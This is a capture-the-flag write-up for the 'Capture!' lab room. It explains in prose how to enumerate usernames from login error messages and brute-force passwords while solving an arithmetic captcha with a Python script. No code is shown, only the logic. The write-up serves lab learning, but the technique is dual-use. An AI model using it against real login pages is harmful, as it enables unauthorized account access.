Capture! is an interesting room, it’s marked as easy but don’t let that fool you.

For this room, I recommend:-

• A solid knowledge of HTTP requests and methods
• Familiarity with Python/any scripting language
• Familiarity with either Burp Suite or OWASP ZAP

‍

‍

Once the machine is booted up, we’re presented with the login form that we’re supposed to bypass using the 2 provided files; “usernames.txt” and “passwords.txt”.

For now, let’s attempt some logins and look at what happens.

‍

‍

Alright, now we know that the site tells us if a user exists or not, we can use this later.

Let’s try some more usernames.

‍

‍

After a couple of failed login attempts, the website attempts to rate limit us using an arithemtic captcha. This means that we probably can’t easily use Burp Suite or OWASP ZAP to brute force the form.

So let’s fill in the captcha and take a look at what’s happening behind the scenes.

‍

‍

The POST request looks pretty simple, we provide a username, password and the captcha solution.

After attempting more logins, I noticed that there is no pattern to the captcha at all, and there’s no way around the rate limitation.. for now.

‍

Finding the username & evading the captcha

The way around the rate limitation is to use Python to send POST requests to the server, and to solve the captcha. To check which username(s) exist, we can simply check for any response that doesn’t contain “Error: The user <user> does not exist”.

‍

Here’s a logic flow of what we’ll do:-

• Define the endpoint for the POST request, and regular expressions to match the captcha equation and the user does not exist error.
• Send incorrect credentials to the site to trigger the rate limiting.
• Use the usernames file to send a POST request for each username
• Get the captcha equation using RegEx and solve it using eval()
• Resend the username with the captcha solution

‍

If the RegEx for the invalid username does not match, we print the entire response, otherwise, we keep looping through the usernames file repeating each step.

‍

‍

As you can see, when we attempt to login with an existing username, we see something different in the response.

Now the error says “Invalid password for user <user>”.

‍

Finding the password

So, now that we have the username, we repeat the same process replacing the file with the “passwords.txt” file, and modifying our POST request.

Using the new error we got from the response, we can modify our RegEx and start fuzzing the password.

‍

‍

And that’s it! We have the flag from the response. If you solved this room in a different way, let me know!

‍

Disclaimer

The purpose of this writeup is solely for educational and informational purposes.

The use of any tools or techniques mentioned in this writeup, including the brute force script, should only be performed on systems that you have explicit permission to test and should never be used to cause harm or engage in any malicious activities.

I am not responsible for any damages or illegal activities resulting from the misuse of the information provided.